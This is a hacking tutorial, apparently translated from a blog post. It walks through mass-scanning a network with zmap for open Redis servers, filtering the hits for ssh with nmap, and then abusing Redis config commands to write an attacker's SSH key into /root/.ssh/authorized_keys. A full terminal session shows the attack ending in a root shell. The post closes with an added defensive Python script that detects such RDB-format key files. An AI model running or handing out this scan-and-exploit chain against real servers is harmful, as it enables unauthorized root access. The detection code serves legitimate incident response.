First bring out zmap, the heavy artillery, to sweep a wide range for machines with the redis service installed; aaa.bbb.0.0 is the network to be scanned.
$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv
Then go through the results in results.csv one by one; note that the host must allow ssh login.
$ cat results.csv | xargs nmap -p 22
Finally, find a concealed environment and get to work; aaa.bbb.ccc.ddd is the target address:
root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key's randomart image is:
+---[RSA 2048]----+
| |
| |
| . |
| . .. o |
| . S .o o . |
| o +o . . o|
| + .o o |
| . E =.. o +|
| o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root
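For responders, the session above leaves a recognizable artifact: `save` writes a Redis RDB dump to /root/.ssh/authorized_keys, so the file begins with the REDIS magic header and carries binary lines around the key. The Python triage check below is an added example, not part of the original post; the function names and the sample bytes (including the key blob) are constructed for illustration.

```python
import base64, hashlib, re

RDB_MAGIC = re.compile(rb"REDIS\d{4}")   # header of a Redis RDB dump
KEY = re.compile(rb"(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521))"
                 rb" +([A-Za-z0-9+/]+=*)(?: +(.*))?$")

def fingerprint(blob: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:                     # binascii.Error is a ValueError
        return "invalid-base64"
    digest = base64.b64encode(hashlib.sha256(raw).digest()).rstrip(b"=")
    return "SHA256:" + digest.decode()

def inspect_authorized_keys(data: bytes) -> dict:
    """Report whether the file is an RDB dump and which key lines it holds."""
    keys, junk = [], 0
    for line in data.split(b"\n"):
        line = line.strip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        m = KEY.search(line)
        if m is None:
            junk += 1                      # binary or otherwise unparseable line
            continue
        comment = (m.group(3) or b"").decode("utf-8", "replace")
        keys.append({"type": m.group(1).decode(), "comment": comment,
                     "fingerprint": fingerprint(m.group(2))})
    return {"rdb_header": RDB_MAGIC.match(data) is not None,
            "keys": keys, "unparseable_lines": junk}

# Constructed samples: a minimal RDB-shaped file holding one key, and a normal file.
_KEY_LINE = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 root@ab871b39330f"
_VALUE = b"\n\n\n" + _KEY_LINE + b"\n\n\n\n"
SAMPLE_RDB = (b"REDIS0006\xfe\x00\x00\x07crackit"
              + bytes([0x40 | (len(_VALUE) >> 8), len(_VALUE) & 0xFF])
              + _VALUE + b"\xff" + bytes(8))
SAMPLE_CLEAN = (b"# ops team\n"
                + _KEY_LINE.replace(b"root@ab871b39330f", b"ops@example") + b"\n")

if __name__ == "__main__":
    for name, blob in (("rdb", SAMPLE_RDB), ("clean", SAMPLE_CLEAN)):
        print(name, inspect_authorized_keys(blob))
```

Any file with `rdb_header` set was written by a Redis instance, and every key it lists should be treated as unauthorized; the fingerprints can be matched against sshd's "Accepted publickey" log entries.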